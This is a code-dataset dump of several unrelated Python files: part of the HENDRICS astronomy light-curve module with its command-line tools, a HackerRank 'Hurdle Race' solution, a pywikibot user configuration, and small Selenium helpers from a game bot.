        GTIs below this length will be filtered out
    gti_split : bool
        If True, create one light curve for each good time interval
    ignore_gtis : bool
        Ignore good time intervals, and get a single light curve that includes
        possible gaps
    outdir : str
        Output directory
    outfile : str
        Output file
    noclobber : bool
        If True, do not overwrite existing files
    deorbit_par : str
        Parameter file used to deorbit the event arrival times before binning
    """
    log.info("Loading file %s..." % f)
    evdata = load_events(f)
    log.info("Done.")

    deorbit_tag = ""
    if deorbit_par is not None:
        evdata = deorbit_events(evdata, deorbit_par)
        deorbit_tag = "_deorb"

    bintime = np.longdouble(interpret_bintime(bintime))

    tag = ""

    gtis = evdata.gti
    tstart = np.min(gtis)
    tstop = np.max(gtis)
    events = evdata.time
    if hasattr(evdata, "instr") and evdata.instr is not None:
        instr = evdata.instr
    else:
        instr = "unknown"

    if ignore_gtis:
        # Treat the whole observation span as a single GTI.
        gtis = np.array([[tstart, tstop]])
        # Bug fix: the attribute is ``gti`` (read above), not ``gtis``; the
        # old code created a stray attribute and left the event list's GTIs
        # untouched, so ``total_lc`` below did not honor ``ignore_gtis``.
        evdata.gti = gtis

    total_lc = evdata.to_lc(100)
    total_lc.instr = instr

    # Then, apply filters. PI and energy selections are mutually exclusive;
    # the PI filter takes precedence.
    if pi_interval is not None and np.all(np.array(pi_interval) > 0):
        pis = evdata.pi
        good = np.logical_and(pis > pi_interval[0], pis <= pi_interval[1])
        events = events[good]
        tag = "_PI%g-%g" % (pi_interval[0], pi_interval[1])
    elif e_interval is not None and np.all(np.array(e_interval) > 0):
        if not hasattr(evdata, "energy") or evdata.energy is None:
            raise ValueError(
                "No energy information is present in the file."
                + " Did you run HENcalibrate?"
            )
        es = evdata.energy
        good = np.logical_and(es > e_interval[0], es <= e_interval[1])
        events = events[good]
        tag = "_E%g-%g" % (e_interval[0], e_interval[1])

    # Save the full-band reference light curve only when a sub-band
    # selection was applied (tag is non-empty only in that case).
    if tag != "":
        save_lcurve(
            total_lc,
            hen_root(f) + "_std_lc" + deorbit_tag + HEN_FILE_EXTENSION,
        )

    # Assign default value if None
    outfile = assign_value_if_none(
        outfile, hen_root(f) + tag + deorbit_tag + "_lc"
    )

    # Take out extension from name, if present, then give extension. This
    # avoids multiple extensions
    outfile = outfile.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
    outdir = assign_value_if_none(outdir, os.path.dirname(os.path.abspath(f)))

    _, outfile = os.path.split(outfile)
    mkdir_p(outdir)
    outfile = os.path.join(outdir, outfile)

    if noclobber and os.path.exists(outfile):
        warnings.warn(
            "File exists, and noclobber option used. Skipping",
            AstropyUserWarning,
        )
        return [outfile]

    lc = Lightcurve.make_lightcurve(
        events,
        bintime,
        tstart=tstart,
        tseg=tstop - tstart,
        mjdref=evdata.mjdref,
        gti=gtis,
    )

    lc.instr = instr
    lc.e_interval = e_interval

    lc = filter_lc_gtis(
        lc, safe_interval=safe_interval, delete=False, min_length=min_length
    )

    if len(lc.gti) == 0:
        warnings.warn(
            "No GTIs above min_length ({0}s) found.".format(min_length)
        )
        return

    lc.header = None
    if hasattr(evdata, "header"):
        lc.header = evdata.header

    if gti_split:
        lcs = lc.split_by_gti()
        outfiles = []

        for ib, l0 in enumerate(lcs):
            local_tag = tag + "_gti{:03d}".format(ib)
            outf = hen_root(outfile) + local_tag + "_lc" + HEN_FILE_EXTENSION
            if noclobber and os.path.exists(outf):
                warnings.warn(
                    "File exists, and noclobber option used. Skipping"
                )
                outfiles.append(outf)
                # Bug fix: actually skip the existing file. The old code
                # fell through, overwrote it and appended its path twice.
                continue
            l0.instr = lc.instr
            l0.header = lc.header
            save_lcurve(l0, outf)
            outfiles.append(outf)
    else:
        log.info("Saving light curve to %s" % outfile)
        save_lcurve(lc, outfile)
        outfiles = [outfile]

    # For consistency in return value
    return outfiles
def lcurve_from_fits(
    fits_file,
    gtistring="GTI",
    timecolumn="TIME",
    ratecolumn=None,
    ratehdu=1,
    fracexp_limit=0.9,
    outfile=None,
    noclobber=False,
    outdir=None,
):
    """
    Load a lightcurve from a fits file and save it in HENDRICS format.

    .. note ::
        FITS light curve handling is still under testing.
        Absolute times might be incorrect depending on the light curve format.

    Parameters
    ----------
    fits_file : str
        File name of the input light curve in FITS format

    Returns
    -------
    outfile : [str]
        Returned as a list with a single element for consistency with
        `lcurve_from_events`

    Other Parameters
    ----------------
    gtistring : str
        Name of the GTI extension in the FITS file
    timecolumn : str
        Name of the column containing times in the FITS file
    ratecolumn : str
        Name of the column containing rates in the FITS file
    ratehdu : str or int
        Name or index of the FITS extension containing the light curve
    fracexp_limit : float
        Minimum exposure fraction allowed
    outfile : str
        Output file name
    noclobber : bool
        If True, do not overwrite existing files
    outdir : str
        Output directory
    """
    warnings.warn(
        """WARNING! FITS light curve handling is still under testing.
        Absolute times might be incorrect."""
    )
    # TODO:
    # treat consistently TDB, UTC, TAI, etc. This requires some documentation
    # reading. For now, we assume TDB
    from astropy.io import fits as pf
    from astropy.time import Time
    import numpy as np
    from stingray.gti import create_gti_from_condition

    outfile = assign_value_if_none(outfile, hen_root(fits_file) + "_lc")
    outfile = outfile.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
    outdir = assign_value_if_none(
        outdir, os.path.dirname(os.path.abspath(fits_file))
    )

    _, outfile = os.path.split(outfile)
    mkdir_p(outdir)
    outfile = os.path.join(outdir, outfile)

    if noclobber and os.path.exists(outfile):
        warnings.warn(
            "File exists, and noclobber option used. Skipping",
            AstropyUserWarning,
        )
        return [outfile]

    lchdulist = pf.open(fits_file)
    lctable = lchdulist[ratehdu].data

    # Units of header keywords
    tunit = lchdulist[ratehdu].header["TIMEUNIT"]

    try:
        mjdref = high_precision_keyword_read(
            lchdulist[ratehdu].header, "MJDREF"
        )
        mjdref = Time(mjdref, scale="tdb", format="mjd")
    except Exception:
        mjdref = None

    # Bug fix: the NuSTAR default MJDREF must be assigned for *every* time
    # unit, not only in the ``tunit == "d"`` branch below. ``mjdref.mjd`` is
    # read unconditionally when building the Lightcurve, so second-based
    # files lacking an MJDREF keyword used to crash with AttributeError.
    mjdref = assign_value_if_none(
        mjdref,
        Time(
            np.longdouble("55197.00076601852"), scale="tdb", format="mjd"
        ),
    )

    try:
        instr = lchdulist[ratehdu].header["INSTRUME"]
    except Exception:
        instr = "EXTERN"

    # ----------------------------------------------------------------
    # Trying to comply with all different formats of fits light curves.
    # It's a madness...
    try:
        tstart = high_precision_keyword_read(
            lchdulist[ratehdu].header, "TSTART"
        )
        tstop = high_precision_keyword_read(lchdulist[ratehdu].header, "TSTOP")
    except Exception:
        raise Exception("TSTART and TSTOP need to be specified")

    # For nulccorr lcs this whould work
    timezero = high_precision_keyword_read(
        lchdulist[ratehdu].header, "TIMEZERO"
    )
    # Sometimes timezero is "from tstart", sometimes it's an absolute time.
    # This tries to detect which case is this, and always consider it
    # referred to tstart
    timezero = assign_value_if_none(timezero, 0)

    # for lcurve light curves this should instead work
    if tunit == "d":
        # TODO:
        # Check this. For now, I assume TD (JD - 2440000.5).
        # This is likely wrong
        timezero = Time(2440000.5 + timezero, scale="tdb", format="jd")
        tstart = Time(2440000.5 + tstart, scale="tdb", format="jd")
        tstop = Time(2440000.5 + tstop, scale="tdb", format="jd")

        timezero = (timezero - mjdref).to("s").value
        tstart = (tstart - mjdref).to("s").value
        tstop = (tstop - mjdref).to("s").value

    if timezero > tstart:
        timezero -= tstart

    time = np.array(lctable.field(timecolumn), dtype=np.longdouble)
    if time[-1] < tstart:
        time += timezero + tstart
    else:
        time += timezero

    try:
        dt = high_precision_keyword_read(lchdulist[ratehdu].header, "TIMEDEL")
        if tunit == "d":
            dt *= 86400
    except Exception:
        warnings.warn(
            "Assuming that TIMEDEL is the median difference between the"
            " light curve times",
            AstropyUserWarning,
        )
        dt = np.median(np.diff(time))

    # ----------------------------------------------------------------
    ratecolumn = assign_value_if_none(
        ratecolumn,
        _look_for_array_in_array(["RATE", "RATE1", "COUNTS"], lctable.names),
    )

    rate = np.array(lctable.field(ratecolumn), dtype=float)

    try:
        rate_e = np.array(lctable.field("ERROR"), dtype=np.longdouble)
    except Exception:
        rate_e = np.zeros_like(rate)

    if "RATE" in ratecolumn:
        # Convert count rates (and their errors) to counts per bin.
        rate *= dt
        rate_e *= dt

    try:
        fracexp = np.array(lctable.field("FRACEXP"), dtype=np.longdouble)
    except Exception:
        fracexp = np.ones_like(rate)

    # Keep bins with a finite rate (rate == rate filters NaNs) and an
    # exposure fraction in [fracexp_limit, 1]; the rest are zeroed out.
    good_intervals = (
        (rate == rate) * (fracexp >= fracexp_limit) * (fracexp <= 1)
    )

    rate[good_intervals] /= fracexp[good_intervals]
    rate_e[good_intervals] /= fracexp[good_intervals]

    rate[np.logical_not(good_intervals)] = 0

    try:
        gtitable = lchdulist[gtistring].data
        gti_list = np.array(
            [
                [a, b]
                for a, b in zip(
                    gtitable.field("START"), gtitable.field("STOP")
                )
            ],
            dtype=np.longdouble,
        )
    except Exception:
        gti_list = create_gti_from_condition(time, good_intervals)

    # Capture the header string *before* closing the HDU list, instead of
    # relying on attributes of an already-closed file.
    header_string = lchdulist[ratehdu].header.tostring()
    lchdulist.close()

    lc = Lightcurve(
        time=time,
        counts=rate,
        err=rate_e,
        gti=gti_list,
        mjdref=mjdref.mjd,
        dt=dt,
    )

    lc.instr = instr
    lc.header = header_string

    log.info("Saving light curve to %s" % outfile)
    save_lcurve(lc, outfile)
    return [outfile]
def lcurve_from_txt(
    txt_file, outfile=None, noclobber=False, outdir=None, mjdref=None, gti=None
):
    """
    Load a lightcurve from a text file.

    Parameters
    ----------
    txt_file : str
        File name of the input light curve in text format. Assumes two columns:
        time, counts. Times are seconds from MJDREF 55197.00076601852 (NuSTAR)
        if not otherwise specified.

    Returns
    -------
    outfile : [str]
        Returned as a list with a single element for consistency with
        `lcurve_from_events`

    Other Parameters
    ----------------
    outfile : str
        Output file name
    noclobber : bool
        If True, do not overwrite existing files
    outdir : str
        Output directory
    mjdref : float, default 55197.00076601852
        the MJD time reference
    gti : [[gti0_0, gti0_1], [gti1_0, gti1_1], ...]
        Good Time Intervals
    """
    import numpy as np

    if mjdref is None:
        mjdref = np.longdouble("55197.00076601852")

    out_name = assign_value_if_none(outfile, hen_root(txt_file) + "_lc")
    # Strip any pre-existing HENDRICS extension, then append exactly one.
    out_name = out_name.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
    out_dir = assign_value_if_none(
        outdir, os.path.dirname(os.path.abspath(txt_file))
    )

    out_name = os.path.split(out_name)[1]
    mkdir_p(out_dir)
    out_path = os.path.join(out_dir, out_name)

    if noclobber and os.path.exists(out_path):
        warnings.warn(
            "File exists, and noclobber option used. Skipping",
            AstropyUserWarning,
        )
        return [out_path]

    times, cts = np.genfromtxt(txt_file, delimiter=" ", unpack=True)
    lc = Lightcurve(
        time=np.array(times, dtype=np.longdouble),
        counts=np.array(cts, dtype=float),
        gti=gti,
        mjdref=mjdref,
    )

    lc.instr = "EXTERN"

    log.info("Saving light curve to %s" % out_path)
    save_lcurve(lc, out_path)
    return [out_path]
def _baseline_lightcurves(lcurves, outroot, p, lam):
    """Compute and store an ALS baseline for each input light curve.

    Every file in ``lcurves`` is loaded, its baseline estimated with the
    asymmetric-least-squares parameters ``p`` and ``lam``, attached to the
    ``base`` attribute, and the light curve saved under a derived name.
    """
    root_template = outroot
    for idx, fname in enumerate(lcurves):
        if root_template is None:
            # No user-supplied root: derive it from each input file name.
            root = hen_root(fname) + "_lc_baseline"
        else:
            root = "{}_{}".format(root_template, idx)
        _, curve = get_file_type(fname)
        curve.base = curve.baseline(p, lam)
        save_lcurve(curve, root + HEN_FILE_EXTENSION)
def _wrap_lc(args):
    """Unpack ``(file, kwargs)`` and run `lcurve_from_events`.

    Errors are reported via a warning but re-raised, so a failure in the
    event-file path aborts the batch.
    """
    fname, kwargs = args
    try:
        return lcurve_from_events(fname, **kwargs)
    except Exception as e:
        warnings.warn("HENlcurve exception: {0}".format(str(e)))
        raise
def _wrap_txt(args):
f, kwargs = args
try:
return lcurve_from_txt(f, **kwargs)
except Exception as e:
warnings.warn("HENlcurve exception: {0}".format(str(e)))
return []
def _wrap_fits(args):
f, kwargs = args
try:
return lcurve_from_fits(f, **kwargs)
except Exception as e:
warnings.warn("HENlcurve exception: {0}".format(str(e)))
return []
def _execute_lcurve(args):
    """Dispatch parsed `HENlcurve` arguments to the right loader.

    Builds the per-file keyword dictionaries, runs the appropriate
    ``lcurve_from_*`` wrapper (serially or in a process pool) and,
    optionally, scrunches/joins the resulting light curves.
    """
    from multiprocessing import Pool

    bintime = args.bintime

    safe_interval = args.safe_interval
    e_interval, pi_interval = args.energy_interval, args.pi_interval
    if args.pi_interval is not None:
        pi_interval = np.array(args.pi_interval)
    if e_interval is not None:
        # Bug fix: the old code assigned to ``args.e_interval`` — a stray,
        # never-read attribute — instead of the local variable used in the
        # keyword dictionary below (compare with the pi_interval branch).
        e_interval = np.array(args.energy_interval)

    # ------ Use functools.partial to wrap lcurve* with relevant keywords---
    if args.fits_input:
        wrap_fun = _wrap_fits
        argdict = {"noclobber": args.noclobber}
    elif args.txt_input:
        wrap_fun = _wrap_txt
        argdict = {"noclobber": args.noclobber}
    else:
        wrap_fun = _wrap_lc
        argdict = {
            "noclobber": args.noclobber,
            "safe_interval": safe_interval,
            "pi_interval": pi_interval,
            "e_interval": e_interval,
            "min_length": args.minlen,
            "gti_split": args.gti_split,
            "ignore_gtis": args.ignore_gtis,
            "bintime": bintime,
            "outdir": args.outdir,
            "deorbit_par": args.deorbit_par,
        }

    arglist = [[f, argdict.copy()] for f in args.files]
    na = len(arglist)
    outfile = args.outfile

    if outfile is not None:
        outroot = os.path.splitext(outfile)[0]
        outname = outroot
        for i in range(na):
            if na > 1:
                # Bug fix: derive the numbered name from the extension-less
                # root. The old code appended "_{i}" to the full file name,
                # embedding the extension in the middle of the name.
                outname = outroot + "_{0}".format(i)
            arglist[i][1]["outfile"] = outname

    # -------------------------------------------------------------------------
    outfiles = []
    if os.name == "nt" or args.nproc == 1:
        # Process serially on Windows (no fork) or when a single worker is
        # requested; this also avoids the pool overhead.
        for a in arglist:
            outfiles.append(wrap_fun(a))
    else:
        pool = Pool(processes=args.nproc)
        for i in pool.imap_unordered(wrap_fun, arglist):
            outfiles.append(i)
        pool.close()

    log.debug(f"{outfiles}")
    if args.scrunch:
        scrunch_lightcurves(outfiles)

    if args.join:
        join_lightcurves(outfiles)
def main(args=None):
    """Main function called by the `HENlcurve` command line script."""
    import argparse
    from .base import _add_default_args, check_negative_numbers_in_args

    description = (
        "Create lightcurves starting from event files. It is "
        "possible to specify energy or channel filtering options"
    )
    parser = argparse.ArgumentParser(description=description)

    parser.add_argument("files", help="List of files", nargs="+")
    parser.add_argument(
        "-b",
        "--bintime",
        type=float,
        default=1,
        help="Bin time; if negative, negative power of 2",
    )
    parser.add_argument(
        "--safe-interval",
        nargs=2,
        type=float,
        default=[0, 0],
        help="Interval at start and stop of GTIs used for filtering",
    )
    parser = _add_default_args(parser, ["energies", "pi"])

    # Boolean switches, declared data-driven to keep the listing compact.
    for flags, helptext in [
        (("-s", "--scrunch"), "Create scrunched light curve (single channel)"),
        (("-j", "--join"), "Create joint light curve (multiple channels)"),
        (("-g", "--gti-split"), "Split light curve by GTI"),
    ]:
        parser.add_argument(
            *flags, help=helptext, default=False, action="store_true"
        )

    parser.add_argument(
        "--minlen",
        type=float,
        default=4,
        help="Minimum length of acceptable GTIs (default:4)",
    )
    parser.add_argument(
        "--ignore-gtis", help="Ignore GTIs", default=False, action="store_true"
    )
    parser.add_argument(
        "-d", "--outdir", type=str, default=None, help="Output directory"
    )

    for flag, helptext in [
        ("--noclobber", "Do not overwrite existing files"),
        ("--fits-input", "Input files are light curves in FITS format"),
        ("--txt-input", "Input files are light curves in txt format"),
    ]:
        parser.add_argument(
            flag, help=helptext, default=False, action="store_true"
        )

    parser = _add_default_args(
        parser, ["deorbit", "output", "loglevel", "debug", "nproc"]
    )

    args = check_negative_numbers_in_args(args)
    args = parser.parse_args(args)

    if args.debug:
        args.loglevel = "DEBUG"

    log.setLevel(args.loglevel)
    with log.log_to_file("HENlcurve.log"):
        _execute_lcurve(args)
def scrunch_main(args=None):
    """Main function called by the `HENscrunchlc` command line script."""
    import argparse

    description = "Sum lightcurves from different instruments or energy ranges"
    parser = argparse.ArgumentParser(description=description)

    parser.add_argument("files", help="List of files", nargs="+")
    parser.add_argument(
        "-o",
        "--out",
        type=str,
        default="out_scrlc" + HEN_FILE_EXTENSION,
        help="Output file",
    )
    parser.add_argument(
        "--loglevel",
        type=str,
        default="WARNING",
        help=(
            "use given logging level (one between INFO, "
            "WARNING, ERROR, CRITICAL, DEBUG; "
            "default:WARNING)"
        ),
    )
    parser.add_argument(
        "--debug",
        action="store_true",
        default=False,
        help="use DEBUG logging level",
    )

    parsed = parser.parse_args(args)

    # --debug overrides whatever log level was requested.
    if parsed.debug:
        parsed.loglevel = "DEBUG"
    log.setLevel(parsed.loglevel)

    with log.log_to_file("HENscrunchlc.log"):
        scrunch_lightcurves(parsed.files, parsed.out)
def baseline_main(args=None):
    """Main function called by the `HENbaselinesub` command line script."""
    import argparse

    description = (
        "Subtract a baseline from the lightcurve using the Asymmetric Least "
        "Squares algorithm. The two parameters p and lambda control the "
        "asymmetry and smoothness of the baseline. See below for details."
    )
    parser = argparse.ArgumentParser(description=description)

    parser.add_argument("files", help="List of files", nargs="+")
    parser.add_argument(
        "-o", "--out", type=str, default=None, help="Output file"
    )
    parser.add_argument(
        "--loglevel",
        type=str,
        default="WARNING",
        help=(
            "use given logging level (one between INFO, "
            "WARNING, ERROR, CRITICAL, DEBUG; "
            "default:WARNING)"
        ),
    )
    parser.add_argument(
        "--debug",
        action="store_true",
        default=False,
        help="use DEBUG logging level",
    )
    parser.add_argument(
        "-p",
        "--asymmetry",
        type=float,
        default=0.01,
        help='"asymmetry" parameter. Smaller values make the '
        'baseline more "horizontal". Typically '
        "0.001 < p < 0.1, but not necessarily.",
    )
    parser.add_argument(
        "-l",
        "--lam",
        type=float,
        default=1e5,
        help='lambda, or "smoothness", parameter. Larger'
        " values make the baseline stiffer. Typically "
        "1e2 < lam < 1e9",
    )

    parsed = parser.parse_args(args)

    # --debug overrides whatever log level was requested.
    if parsed.debug:
        parsed.loglevel = "DEBUG"
    log.setLevel(parsed.loglevel)

    with log.log_to_file("HENbaseline.log"):
        _baseline_lightcurves(
            parsed.files, parsed.out, parsed.asymmetry, parsed.lam
        )
| 1.96875 | 2 |
solution/practice/algorithms/implementation/TheHurdleRace/solution.py | satyam857/HackerRank | 0 | 12762548 | <gh_stars>0
#!/bin/python3
import sys
def hurdleRace(k, height):
    """Return the minimum doses of potion needed to clear every hurdle.

    Each dose raises the natural jump height ``k`` by one unit, so the
    answer is how far the tallest hurdle exceeds ``k`` (zero if none does).

    Parameters
    ----------
    k : int
        Maximum height the character can jump without potion.
    height : list of int
        Heights of the hurdles.
    """
    # max(0, ...) replaces the explicit sign check on the gap.
    return max(0, max(height) - k)
if __name__ == "__main__":
    # First input line: n (number of hurdles) and k (natural jump height).
    n, k = input().strip().split(' ')
    n, k = [int(n), int(k)]
    # Second input line: the n hurdle heights.
    height = list(map(int, input().strip().split(' ')))
    result = hurdleRace(k, height)
    print(result)
| 3.546875 | 4 |
pywikibot/.pywikibot/user-config.py | Arkanosis/Arkonf | 13 | 12762549 | mylang='fr'
# Pywikibot user configuration: operate on the Wikipedia family.
family = 'wikipedia'
# Account used by the bot on the French Wikipedia.
usernames['wikipedia']['fr']=u'Arktest'
# Encoding used for console input/output.
console_encoding = 'utf-8'
| 1.25 | 1 |
src/util_game.py | aescarcha/king-bot | 0 | 12762550 | <reponame>aescarcha/king-bot<gh_stars>0
from .custom_driver import client
from .utils import log
def close_modal(browser: client):
    """Dismiss the currently open modal dialog by clicking its close link."""
    modal = browser.find("//div[@class='modalContent']")
    close_link = modal.find_element_by_xpath(
        ".//a[@class='closeWindow clickable']"
    )
    browser.click(close_link)
def close_welcome_screen(browser: client):
    """Close the welcome-screen overlay, logging the action first."""
    screen = browser.find("//div[contains(@class, 'welcomeScreen')]")
    log("closing welcome-screen")
    close_link = screen.find_element_by_xpath(
        ".//a[@class='closeWindow clickable']"
    )
    browser.click(close_link)
| 2.390625 | 2 |